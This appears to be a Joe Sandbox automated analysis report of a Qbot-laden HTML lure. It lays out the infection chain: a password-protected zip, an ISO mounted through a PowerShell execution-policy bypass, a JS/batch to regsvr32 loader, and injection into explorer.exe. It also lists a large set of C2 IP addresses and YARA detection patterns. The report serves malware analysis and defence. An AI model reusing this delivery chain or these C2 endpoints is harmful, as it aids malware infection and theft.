Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Calculation#8785(Sep16).html

Overview

General Information

Sample Name:Calculation#8785(Sep16).html
Analysis ID:704342
MD5:7098151184920994fe048b20a9fbd57c
SHA1:c0c017f604912f8d5f5d5104512fbca9b81c974b
SHA256:fcc6ca0e284f527bfa0c8c9bc25f81389532cf7a2ddfd3e8c01ae2e7feb39ad1
Tags:html
Infos:

Detection

Qbot
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Phishing site detected (based on favicon image match)
Yara detected Qbot
Malicious sample detected (through community Yara rule)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Wscript starts Powershell (via cmd or directly)
Injects code into the Windows Explorer (explorer.exe)
Uses 7zip to decompress a password protected archive
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Tries to load missing DLLs
Found evasive API chain checking for process token information
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 6132 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • chrome.exe (PID: 5224 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1800,i,15047504098167429117,11276190225124185928,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
    • unarchiver.exe (PID: 6748 cmdline: C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\Calculation#8785(Sep16).zip MD5: 9DE2E060A2985A232D8B96F9EC847A19)
      • 7za.exe (PID: 7012 cmdline: C:\Windows\System32\7za.exe" x -pabc444 -y -o"C:\Users\user\AppData\Local\Temp\idbrycd1.fis" "C:\Users\user\Downloads\Calculation#8785(Sep16).zip MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
        • conhost.exe (PID: 6316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 1316 cmdline: cmd.exe" /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\idbrycd1.fis\Calculation#8785.iso MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 3960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 3680 cmdline: powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\idbrycd1.fis\Calculation#8785.iso" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • wscript.exe (PID: 5064 cmdline: "C:\Windows\System32\WScript.exe" "E:\more\seeSay.js" MD5: 7075DD7B9BE8807FCA93ACD86F724884)
        • cmd.exe (PID: 4268 cmdline: C:\Windows\system32\cmd.exe /c ""E:\more\myTheir.bat" r egs v" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • regsvr32.exe (PID: 6912 cmdline: regsvr32 more/veryAs.db MD5: 426E7499F6A7346F0410DEAD0805586B)
            • explorer.exe (PID: 712 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • chrome.exe (PID: 5392 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Calculation#8785(Sep16).html MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
  • cleanup

Malware Configuration

Threatname: Qbot

{"Bot id": "obama204", "Campaign": "1663313119", "Version": "403.892", "C2 list": ["119.82.111.158:443", "134.35.10.207:443", "200.161.62.126:32101", "70.51.132.197:2222", "78.100.228.93:995", "78.100.225.34:2222", "45.51.148.111:993", "186.154.92.181:443", "66.181.164.43:443", "217.165.85.223:993", "70.49.33.200:2222", "193.3.19.37:443", "41.96.56.224:443", "99.232.140.205:2222", "88.231.221.198:995", "76.169.76.44:2222", "68.53.110.74:995", "196.64.237.138:443", "190.44.40.48:995", "72.88.245.71:443", "179.111.111.88:32101", "197.94.210.133:443", "81.131.161.131:2078", "87.243.113.104:995", "84.38.133.191:443", "14.184.97.67:443", "123.240.131.1:443", "194.166.207.160:995", "176.90.193.145:2222", "180.180.131.95:443", "191.84.204.214:995", "191.97.234.238:995", "41.111.15.78:995", "91.116.160.252:443", "2.182.101.3:990", "99.253.251.74:443", "154.181.203.230:995", "64.207.215.69:443", "85.114.110.108:443", "102.38.97.57:995", "109.158.159.179:993", "186.105.182.127:443", "71.10.27.196:2222", "71.10.27.196:2222", "41.69.118.117:995", "47.146.182.110:443", "197.204.143.46:443", "194.49.79.231:443", "88.242.228.16:53", "88.231.221.198:443", "175.110.231.67:443", "196.92.172.24:8443", "186.50.245.74:995", "100.1.5.250:995", "78.182.113.80:443", "41.96.171.218:443", "154.246.182.210:443", "81.214.220.237:443", "187.205.222.100:443", "95.136.41.50:443", "84.38.133.191:443", "190.158.58.236:443", "105.99.80.23:443", "105.197.192.21:995", "181.127.138.30:443", "167.60.82.242:995", "196.112.34.71:443", "88.251.38.53:443", "68.224.229.42:443", "37.37.206.87:995", "37.76.197.124:443", "188.157.6.170:443", "68.50.190.55:443", "181.111.20.201:443", "31.166.116.171:443", "84.238.253.171:443", "197.49.50.44:443", "169.159.95.135:2222", "45.160.124.211:995", "113.22.102.155:443", "211.248.176.4:443", "186.167.249.206:443", "85.98.206.165:995", "139.195.132.210:2222", "182.213.208.5:443", "201.177.163.176:443", "45.183.234.180:443", "98.180.234.228:443", "184.82.110.50:995", "179.24.245.193:995", "94.99.110.157:995", "181.56.125.32:443", "119.42.124.18:443", "181.231.229.133:443", "2.89.78.130:993", "70.81.121.237:2222", "181.81.116.144:443", "197.11.128.156:443", "41.142.132.190:443", "105.111.60.60:995", "154.238.151.197:995", "156.219.49.22:995", "179.223.89.154:995", "102.101.231.141:443", "220.116.250.45:443", "138.0.114.166:443", "62.114.193.186:995", "85.98.46.114:443", "184.99.123.118:443", "186.120.58.88:443", "46.186.216.41:32100", "156.213.107.29:995", "27.73.215.46:32102", "68.151.196.147:995", "68.129.232.158:443", "45.241.140.181:995", "212.156.51.194:443", "87.75.195.211:443", "1.10.253.207:443", "87.220.229.164:2222", "109.200.165.82:443", "41.105.197.244:443", "190.59.247.136:995", "219.69.103.199:443", "61.105.45.244:443", "105.105.104.0:443", "169.1.47.111:443", "210.195.18.76:2222", "118.175.247.124:995", "88.246.170.2:443", "149.140.193.233:443", "171.248.157.128:995", "118.68.220.199:443", "139.195.63.45:2222", "118.216.99.232:443", "181.80.133.202:443", "102.40.236.32:995", "46.116.229.16:443", "61.70.29.53:443", "179.108.32.195:443", "171.238.230.59:443", "81.56.22.251:995", "31.32.180.179:443", "186.64.87.202:443", "85.139.203.42:32101"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
    0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Qbot_92c67a6dunknownunknown
    • 0x10f6c:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
    0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Qbot_3074a8d4unknownunknown
    • 0x1ca14:$a4: %u;%u;%u;
    • 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x
    • 0x1cdd8:$a6: %u&%s&%u
    • 0x8c6d:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16
    • 0x8fab:$set_key: 8D 87 00 04 00 00 50 56 E8 22 16 00 00 59 8B D0 8B CE E8
    • 0x32d9:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D
    • 0x2d31:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 22 F0 FF FF 83 C4 10
    • 0xc8ff:$generate_random_alpha_num_string: 57 E8 D5 DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 DD 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
    0000001D.00000000.511078264.00000000032E0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
      0000001D.00000000.511078264.00000000032E0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Qbot_92c67a6dunknownunknown
      • 0x10f6c:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
      Click to see the 7 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      27.2.regsvr32.exe.31b0000.0.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
        27.2.regsvr32.exe.31b0000.0.raw.unpackWindows_Trojan_Qbot_92c67a6dunknownunknown
        • 0x10f6c:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
        27.2.regsvr32.exe.31b0000.0.raw.unpackWindows_Trojan_Qbot_3074a8d4unknownunknown
        • 0x1ca14:$a4: %u;%u;%u;
        • 0x1cf50:$a5: %u.%u.%u.%u.%u.%u.%04x
        • 0x1cdd8:$a6: %u&%s&%u
        • 0x8c6d:$get_string1: 33 D2 8B C6 6A 5A 5F F7 F7 8B 7D 08 8A 04 3A 8B 55 F8 8B 7D 10 3A 04 16
        • 0x8fab:$set_key: 8D 87 00 04 00 00 50 56 E8 22 16 00 00 59 8B D0 8B CE E8
        • 0x32d9:$do_computer_use_russian_like_keyboard: B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D
        • 0x2d31:$execute_each_tasks: 8B 44 0E 0C 85 C0 74 04 FF D0 EB 12 6A 00 6A 00 6A 00 FF 74 0E 08 E8 22 F0 FF FF 83 C4 10
        • 0xc8ff:$generate_random_alpha_num_string: 57 E8 D5 DC FF FF 48 50 8D 85 30 F6 FF FF 6A 00 50 E8 DD 6D 00 00 8B 4D F8 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C
        29.0.explorer.exe.32e0000.0.raw.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
          29.0.explorer.exe.32e0000.0.raw.unpackWindows_Trojan_Qbot_92c67a6dunknownunknown
          • 0x10f6c:$a: 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00
          Click to see the 13 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results
          Source: 27.2.regsvr32.exe.31b0000.0.unpackMalware Configuration Extractor: Qbot {"Bot id": "obama204", "Campaign": "1663313119", "Version": "403.892", "C2 list": ["119.82.111.158:443", "134.35.10.207:443", "200.161.62.126:32101", "70.51.132.197:2222", "78.100.228.93:995", "78.100.225.34:2222", "45.51.148.111:993", "186.154.92.181:443", "66.181.164.43:443", "217.165.85.223:993", "70.49.33.200:2222", "193.3.19.37:443", "41.96.56.224:443", "99.232.140.205:2222", "88.231.221.198:995", "76.169.76.44:2222", "68.53.110.74:995", "196.64.237.138:443", "190.44.40.48:995", "72.88.245.71:443", "179.111.111.88:32101", "197.94.210.133:443", "81.131.161.131:2078", "87.243.113.104:995", "84.38.133.191:443", "14.184.97.67:443", "123.240.131.1:443", "194.166.207.160:995", "176.90.193.145:2222", "180.180.131.95:443", "191.84.204.214:995", "191.97.234.238:995", "41.111.15.78:995", "91.116.160.252:443", "2.182.101.3:990", "99.253.251.74:443", "154.181.203.230:995", "64.207.215.69:443", "85.114.110.108:443", "102.38.97.57:995", "109.158.159.179:993", "186.105.182.127:443", "71.10.27.196:2222", "71.10.27.196:2222", "41.69.118.117:995", "47.146.182.110:443", "197.204.143.46:443", "194.49.79.231:443", "88.242.228.16:53", "88.231.221.198:443", "175.110.231.67:443", "196.92.172.24:8443", "186.50.245.74:995", "100.1.5.250:995", "78.182.113.80:443", "41.96.171.218:443", "154.246.182.210:443", "81.214.220.237:443", "187.205.222.100:443", "95.136.41.50:443", "84.38.133.191:443", "190.158.58.236:443", "105.99.80.23:443", "105.197.192.21:995", "181.127.138.30:443", "167.60.82.242:995", "196.112.34.71:443", "88.251.38.53:443", "68.224.229.42:443", "37.37.206.87:995", "37.76.197.124:443", "188.157.6.170:443", "68.50.190.55:443", "181.111.20.201:443", "31.166.116.171:443", "84.238.253.171:443", "197.49.50.44:443", "169.159.95.135:2222", "45.160.124.211:995", "113.22.102.155:443", "211.248.176.4:443", "186.167.249.206:443", "85.98.206.165:995", "139.195.132.210:2222", "182.213.208.5:443", "201.177.163.176:443", "45.183.234.180:443", "98.180.234.228:443", "184.82.110.50:995", "179.24.245.193:995", "94.99.110.157:995", "181.56.125.32:443", "119.42.124.18:443", "181.231.229.133:443", "2.89.78.130:993", "70.81.121.237:2222", "181.81.116.144:443", "197.11.128.156:443", "41.142.132.190:443", "105.111.60.60:995", "154.238.151.197:995", "156.219.49.22:995", "179.223.89.154:995", "102.101.231.141:443", "220.116.250.45:443", "138.0.114.166:443", "62.114.193.186:995", "85.98.46.114:443", "184.99.123.118:443", "186.120.58.88:443", "46.186.216.41:32100", "156.213.107.29:995", "27.73.215.46:32102", "68.151.196.147:995", "68.129.232.158:443", "45.241.140.181:995", "212.156.51.194:443", "87.75.195.211:443", "1.10.253.207:443", "87.220.229.164:2222", "109.200.165.82:443", "41.105.197.244:443", "190.59.247.136:995", "219.69.103.199:443", "61.105.45.244:443", "105.105.104.0:443", "169.1.47.111:443", "210.195.18.76:2222", "118.175.247.124:995", "88.246.170.2:443", "149.140.193.233:443", "171.248.157.128:995", "118.68.220.199:443", "139.195.63.45:2222", "118.216.99.232:443", "

          Phishing

          barindex
          Phishing site detected (based on favicon image match)
          Source: file:///C:/Users/user/Desktop/Calculation%238785(Sep16).htmlMatcher: Template: adobe matched with high similarity
          Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
          Source: Binary string: amstream.pdb source: explorer.exe, 0000001D.00000002.722273737.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: amstream.pdbGCTL source: explorer.exe, 0000001D.00000002.722273737.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_032EC134 FindFirstFileW,FindNextFileW,29_2_032EC134
          Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 4x nop then jmp 04EE1969h9_2_04EE172F
          Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 4x nop then jmp 04EE0B1Ch9_2_04EE02C8
          Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 4x nop then jmp 04EE11B7h9_2_04EE02C8
          Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 4x nop then jmp 04EE0B1Ch9_2_04EE0A7C
          Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 4x nop then jmp 04EE0B1Ch9_2_04EE0AB7
          Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: Calculation#8785(Sep16).htmlString found in binary or memory: https://getbootstrap.com/)
          Source: Calculation#8785(Sep16).htmlString found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
          Source: Calculation#8785(Sep16).htmlString found in binary or memory: https://use.typekit.net/af/40207f/0000000000000000000176ff/27/a?primer=0635fba006f1437d962ae878ad04a
          Source: Calculation#8785(Sep16).htmlString found in binary or memory: https://use.typekit.net/af/40207f/0000000000000000000176ff/27/d?primer=0635fba006f1437d962ae878ad04a
          Source: Calculation#8785(Sep16).htmlString found in binary or memory: https://use.typekit.net/af/40207f/0000000000000000000176ff/27/l?primer=0635fba006f1437d962ae878ad04a
          Source: Calculation#8785(Sep16).htmlString found in binary or memory: https://use.typekit.net/af/4b3e87/000000000000000000017706/27/a?primer=0635fba006f1437d962ae878ad04a
          Source: Calculation#8785(Sep16).htmlString found in binary or memory: https://use.typekit.net/af/4b3e87/000000000000000000017706/27/d?primer=0635fba006f1437d962ae878ad04a
          Source: Calculation#8785(Sep16).htmlString found in binary or memory: https://use.typekit.net/af/4b3e87/000000000000000000017706/27/l?primer=0635fba006f1437d962ae878ad04a
          Source: Calculation#8785(Sep16).htmlString found in binary or memory: https://use.typekit.net/af/74ffb1/000000000000000000017702/27/a?primer=0635fba006f1437d962ae878ad04a
          Source: Calculation#8785(Sep16).htmlString found in binary or memory: https://use.typekit.net/af/74ffb1/000000000000000000017702/27/d?primer=0635fba006f1437d962ae878ad04a
          Source: Calculation#8785(Sep16).htmlString found in binary or memory: https://use.typekit.net/af/74ffb1/000000000000000000017702/27/l?primer=0635fba006f1437d962ae878ad04a
          Source: Calculation#8785(Sep16).htmlString found in binary or memory: https://use.typekit.net/af/a2527e/000000000000000000017704/27/a?primer=0635fba006f1437d962ae878ad04a
          Source: Calculation#8785(Sep16).htmlString found in binary or memory: https://use.typekit.net/af/a2527e/000000000000000000017704/27/d?primer=0635fba006f1437d962ae878ad04a
          Source: Calculation#8785(Sep16).htmlString found in binary or memory: https://use.typekit.net/af/a2527e/000000000000000000017704/27/l?primer=0635fba006f1437d962ae878ad04a
          Source: Calculation#8785(Sep16).htmlString found in binary or memory: https://use.typekit.net/af/cb695f/000000000000000000017701/27/a?primer=0635fba006f1437d962ae878ad04a
          Source: Calculation#8785(Sep16).htmlString found in binary or memory: https://use.typekit.net/af/cb695f/000000000000000000017701/27/d?primer=0635fba006f1437d962ae878ad04a
          Source: Calculation#8785(Sep16).htmlString found in binary or memory: https://use.typekit.net/af/cb695f/000000000000000000017701/27/l?primer=0635fba006f1437d962ae878ad04a
          Source: Calculation#8785(Sep16).htmlString found in binary or memory: https://use.typekit.net/af/eaf09c/000000000000000000017703/27/a?primer=0635fba006f1437d962ae878ad04a
          Source: Calculation#8785(Sep16).htmlString found in binary or memory: https://use.typekit.net/af/eaf09c/000000000000000000017703/27/d?primer=0635fba006f1437d962ae878ad04a
          Source: Calculation#8785(Sep16).htmlString found in binary or memory: https://use.typekit.net/af/eaf09c/000000000000000000017703/27/l?primer=0635fba006f1437d962ae878ad04a
          Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Secure-ENID=6.SE=Md0Ynyf9ahpkx1CxTGF0vY434NJ6ymH-gDI2Tl5Ly-NQYGPjnNfggtiFRMAwx4JRDOC_gavEPcD5cTBJzUgtbJobmBEuJ8xi2UuotxvOZgApoqSIg1b0RP47U08XG8Bz_SExSzKy0ETSsajbToDlYyFsxfI93p7AyRAd-OeIBA0; CONSENT=PENDING+070
          Source: unknownDNS traffic detected: queries for: accounts.google.com
          Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-104.0.5112.81Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 29_2_032E5CC4 GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,BitBlt,GetCursorInfo,CopyIcon,GetIconInfo,GetObjectW,DrawIconEx,SelectObject,GetObjectW,GetDIBits,DeleteDC,DeleteDC,DeleteObject,29_2_032E5CC4
          Source: unarchiver.exe, 00000009.00000002.440908695.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 27.2.regsvr32.exe.31b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 27.2.regsvr32.exe.31b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 29.0.explorer.exe.32e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 29.0.explorer.exe.32e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 29.2.explorer.exe.32e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 29.2.explorer.exe.32e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 29.2.explorer.exe.32e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 29.2.explorer.exe.32e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 27.2.regsvr32.exe.31b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 27.2.regsvr32.exe.31b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 29.0.explorer.exe.32e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 29.0.explorer.exe.32e0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 0000001D.00000000.511078264.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 0000001D.00000000.511078264.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 0000001B.00000003.499883597.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 0000001B.00000003.499883597.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Source: 0000001B.00000002.511786081.00000000031B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_92c67a6d Author: unknown
          Source: 0000001B.00000002.511786081.00000000031B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Qbot_3074a8d4 Author: unknown
          Wscript starts Powershell (via cmd or directly)
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\idbrycd1.fis\Calculation#8785.iso"
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""E:\more\myTheir.bat" r egs v"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath "C:\Users\user\AppData\Local\Temp\idbrycd1.fis\Calculation#8785.iso"Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""E:\more\myTheir.bat" r egs v"Jump to behavior
          Uses 7zip to decompress a password protected archive
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pabc444 -y -o"C:\Users\user\AppData\Local\Temp\idbrycd1.fis" "C:\Users\user\Downloads\Calculation#8785(Sep16).zip
          Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\7za.exe C:\Windows\System32\7za.exe" x -pabc444 -y -o"C:\Users\user\AppData\Local\Temp\idbrycd1.fis" "C:\Users\user\Downloads\Calculation#8785(Sep16).zipJump to behavior
          Source: 27.2.regsvr32.exe.31b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 27.2.regsvr32.exe.31b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
          Source: 29.0.explorer.exe.32e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_92c67a6d reference_sample = 636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02, os = windows, severity = x86, creation_date = 2021-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = 4719993107243a22552b65e6ec8dc850842124b0b9919a6ecaeb26377a1a5ebd, id = 92c67a6d-9290-4cd9-8123-7dace2cf333d, last_modified = 2021-08-23
          Source: 29.0.explorer.exe.32e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Qbot_3074a8d4 reference_sample = c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a, os = windows, severity = x86, creation_date = 2022-06-07, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Qbot, fingerprint = c233a0c24576450ce286d96126379b6b28d537619e853d860e2812f521b810ac, id = 3074a8d4-d93c-4987-9031-9ecd3881730d, last_modified = 2022-07-18
